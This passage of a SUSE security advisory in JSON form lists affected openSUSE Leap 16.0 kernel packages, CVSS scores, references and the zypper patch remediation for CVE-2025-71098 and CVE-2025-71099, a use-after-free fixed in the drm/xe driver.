"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71098"
},
{
"cve": "CVE-2025-71099",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71099"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/oa: Fix potential UAF in xe_oa_add_config_ioctl()\n\nIn xe_oa_add_config_ioctl(), we accessed oa_config-\u003eid after dropping\nmetrics_lock. Since this lock protects the lifetime of oa_config, an\nattacker could guess the id and call xe_oa_remove_config_ioctl() with\nperfect timing, freeing oa_config before we dereference it, leading to\na potential use-after-free.\n\nFix this by caching the id in a local variable while holding the lock.\n\nv2: (Matt A)\n- Dropped mutex_unlock(\u0026oa-\u003emetrics_lock) ordering change from\n xe_oa_remove_config_ioctl()\n\n(cherry picked from commit 28aeaed130e8e587fd1b73b6d66ca41ccc5a1a31)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71099",
"url": "https://www.suse.com/security/cve/CVE-2025-71099"
},
{
"category": "external",
"summary": "SUSE Bug 1256592 for CVE-2025-71099",
"url": "https://bugzilla.suse.com/1256592"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
